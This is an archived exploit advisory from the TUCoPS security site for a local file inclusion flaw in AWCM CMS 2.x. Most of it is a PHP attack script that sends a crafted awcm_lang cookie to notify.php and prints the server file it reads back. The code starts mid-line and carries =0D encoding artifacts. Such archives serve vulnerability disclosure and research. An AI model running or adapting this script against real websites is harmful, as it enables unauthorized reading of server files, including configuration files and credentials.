Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b1a-1271.htm

Awcm Cms Local File Inclusion Vulnerability



Awcm Cms Local File Inclusion Vulnerability
Awcm Cms Local File Inclusion Vulnerability



# Author: SwEET-DeViL =0D
# Published: 10-6-2010=0D
# Software Link: http://www.awcm-cms.com/=0D 
# Download Software: http://sourceforge.net/projects/awcm/=0D 
# Version: 2.x=0D
# Tested on: Lunix=0D
=0D
Exploit :=0D
=0D
"http://".$host.$argv[2];=0D 
       $CURL_in ="GET ".$Path."/notify.php?v=a HTTP/1.0\r\n";=0D
       $CURL_in.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";=0D
       $CURL_in.="Pragma: no-cache\r\n";=0D
       $CURL_in.="Cookie: awcm_lang=".$argv[3]."".";\r\n";=0D
       $CURL_in.="Connection: Close\r\n\r\n";=0D
=0D
       if ( empty($argv[3]) ){=0D
               echo "\n[-] Error : Exploit failed\n";=0D
               die;=0D
       }=0D
=0D
       $FoN = @fsockopen($host, 80);=0D
       if(!$FoN){=0D
               echo "\n[-] Error : Can't connect to ".$host." !!\n";=0D
               die;=0D
       }=0D
=0D
       fputs($FoN, $CURL_in);=0D
       while (!feof($FoN)) $data .= fread($FoN, 1024);=0D
       fclose($FoN);=0D
=0D
       $error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );=0D
       if ( !empty($error_1) ){=0D
               echo "\n[-] Error : 404 Not Found. \n";=0D
               die;=0D
       }=0D
=0D
       $error_2 = strstr( $data, "HTTP/1.1 406 Not Acceptable" );=0D
       if ( !empty($error_2) ){=0D
               echo "\n[-] Error : 406 Not Acceptable. \n";=0D
               die;=0D
       }=0D
=0D
=0D
=0D
$EXc = explode("",$data);=0D
$EXx = explode("",$EXc[1]);=0D
$CODE = strip_tags($EXx[0]);=0D
$CODE2 = preg_replace("/\r|\t/",'',$CODE);=0D
$CODE2 = trim($CODE2);=0D
=0D
if (empty($CODE2)){=0D
print ('=0D
=0D
[-] Error : Sorry! File not Found=0D
=0D
');=0D
}else{=0D
print ('=0D
[+]=0D
------------------------------------------------------------=0D
').$CODE2;=0D
=0D
=0D
=0D
print ('=0D
=0D
------------------------------------------------------------=0D
');=0D
=0D
}=0D
=0D
?>


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH